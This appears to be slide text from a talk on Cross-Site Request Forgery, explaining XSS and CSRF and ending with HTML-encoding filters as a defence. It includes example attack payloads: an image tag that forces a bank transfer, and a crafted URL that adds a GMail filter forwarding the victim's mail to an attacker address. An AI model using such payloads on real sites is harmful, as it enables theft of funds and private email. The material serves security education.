Cross-Site Request Forgery“The Sleeping Giant of Website Vulnerabilities”

Cross-Site Request Forgery“The Sleeping Giant of Website Vulnerabilities”
Cross-Site Scripting (XSS) - forcing malicious content to be
served by a trusted website to an unsuspecting user.

Cross-Site Request Forgery (CSRF) - forcing an unsuspecting
user’s browser to send requests they didn’t intend. (wire
transfer, blog post, etc.)

<IMG SRC=http://webbank/transfer_funds.cgi?
from=314159265&to=1618&amount=5000&date=11072006>
CSRF Can and Can Not Do
Can:
Force a user to make any HTTP request to anywhere.
Can’t:
Read the web page that is returned in the browser.

GMail E-mail Hijack Technique
• Victim visits a web page containing JavaScript malware. The
JavaScript malware forces the user to make a multipart/form-data
form submission to GMail (CSRF).
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/formdata&_
action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf
2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attac
h=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
• If the user is logged-in, a filter is entered into the user’s account,
which they are unlikely to notice, that forwards all their email to
“evilinbox@mailinator.com”.

XSS Output Filtering (HTML Encoding)
• $data =~ s/(<|>|\"|\'|\(|\)|:)/'&#'.ord($1).';'/sge;
• $data =~ s/([^\w])/'&#'.ord($1).';'/sge;